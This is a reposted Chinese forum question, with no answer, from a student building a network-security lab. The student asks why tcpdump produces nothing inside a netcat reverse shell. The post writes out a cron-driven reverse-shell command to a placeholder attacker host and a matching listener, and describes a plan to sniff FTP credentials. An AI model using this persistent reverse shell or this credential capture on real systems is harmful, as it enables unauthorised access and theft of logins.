tcpdump 无法通过 netcat

问题描述

我正在做网络安全项目,我必须创建一些攻击场景。

所以我们有两个设备。 FTP 服务器和黑客的计算机。我在 FTP 服务器上制作了一个脚本,每分钟运行一次并执行命令 (nc hacker.ip -e /bin/sh)。

黑客的计算机侦听端口 21 (netcat -lvp 21) 上的任何连接,因此我从 FTP 服务器获得了一个 root shell。

方案的想法是使用 tcpdump 捕获一些 FTP 凭据,但有一个问题。 当我在反向 shell 中运行 tcpdump 时,任何事情都会发生。我仍然可以运行 ls、ps 等命令... 像 tcpdump 无法识别。

Reverse shell tcpdump

我尝试在真正的 FTP shell 上运行它并且它可以工作,但我没有成功在互联网上找到任何东西来理解它为什么不起作用。

FTP tcpdump

如果有人有想法,我很乐意了解我该怎么做。

祝您有美好的一天!

解决方法

暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!

如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。

小编邮箱:dio#foxmail.com (将#修改为@)